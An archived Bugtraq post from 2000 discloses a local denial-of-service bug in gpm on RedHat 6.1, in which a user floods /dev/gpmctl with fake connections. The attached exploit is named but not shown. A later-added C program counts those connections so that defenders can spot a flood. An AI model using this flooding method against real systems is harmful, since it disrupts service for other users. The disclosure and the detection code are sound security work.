5214198 2000-06-20 18:39 /74 lines/ Postmaster
Recipient: Bugtraq (import) <11349>
Subject: Bug in gpm
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10006201453090.1812-200000@apollo.aci.com.pl>
Date: Tue, 20 Jun 2000 15:21:16 +0200
Reply-To: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

Hello.

More than 6 months ago I discovered some kind of DoS bug in gpm shipped
with RedHat 6.1 (probably others). A regular user can simply DoS gpm
or (in several circumstances) the whole system. In general the problem is
that /dev/gpmctl uses STREAM and you can flood it with many faked
connections.

One week ago RedHat announced that the bug is *FIXED* now and everyone can
download a new version of this package from redhat-rawhide
(/pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm),
so I decided to drop a note here. The funny thing is that I couldn't find
info about it in the ChangeLog of this package...

If you want to play with it, try the attached code.

___
Tomasz Grabowski [Akademickie Centrum Informatyki]
{CADENCE of Lam3rZ}
The progress only comes through struggle...

[Attachment: fgpm.c]
(5214198) ------------------------------------------(Rewrapped)
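
A defender-side check for the condition the message describes, added here as an example; it is not part of the original post or of gpm. It counts stream sockets on /dev/gpmctl in a table laid out like Linux's /proc/net/unix. The sample table is constructed and the function name is an assumption of this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample in /proc/net/unix layout (not captured from a real host). */
static const char SAMPLE[] =
    "Num       RefCount Protocol Flags    Type St Inode Path\n"
    "0000000000000000: 00000002 00000000 00010000 0001 01 1201 /dev/gpmctl\n"
    "0000000000000000: 00000003 00000000 00000000 0001 03 1302 /dev/gpmctl\n"
    "0000000000000000: 00000003 00000000 00000000 0001 03 1303 /dev/gpmctl\n"
    "0000000000000000: 00000002 00000000 00000000 0001 02 1304 /dev/gpmctl\n"
    "0000000000000000: 00000003 00000000 00000000 0001 03 1305\n"
    "0000000000000000: 00000002 00000000 00000000 0002 01 1400 /dev/log\n"
    "0000000000000000: 00000003 00000000 00000000 0001 03 1500 /dev/gpmctl2\n";

/* Count SOCK_STREAM (Type 0001) entries bound to `path` that are connected
 * (St 03) or still queued for accept() (St 02). The listener itself is St 01
 * and is not counted. Paths containing spaces are not handled. */
int count_stream_conns(const char *table, const char *path)
{
    int n = 0;
    const char *line = table;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        char buf[256], sockpath[128] = "";
        unsigned type, st;
        if (len < sizeof buf) {              /* over-long lines are skipped */
            memcpy(buf, line, len);
            buf[len] = '\0';
            /* The header row fails at the first hex field and is ignored. */
            if (sscanf(buf, "%*s %*x %*x %*x %x %x %*u %127s",
                       &type, &st, sockpath) >= 2
                && type == 1 && (st == 2 || st == 3)
                && strcmp(sockpath, path) == 0)
                n++;
        }
        line += len + (eol ? 1 : 0);
    }
    return n;
}

int main(void)
{
    static char buf[1 << 20];
    FILE *f = fopen("/proc/net/unix", "r");
    size_t n = f ? fread(buf, 1, sizeof buf - 1, f) : 0;
    if (f) fclose(f);
    buf[n] = '\0';   /* fall back to the constructed sample if unreadable */
    printf("/dev/gpmctl stream connections: %d\n",
           count_stream_conns(n ? buf : SAMPLE, "/dev/gpmctl"));
    return 0;
}
```

What count is abnormal depends on the host; on a machine with a handful of console clients, a count in the hundreds is worth investigating.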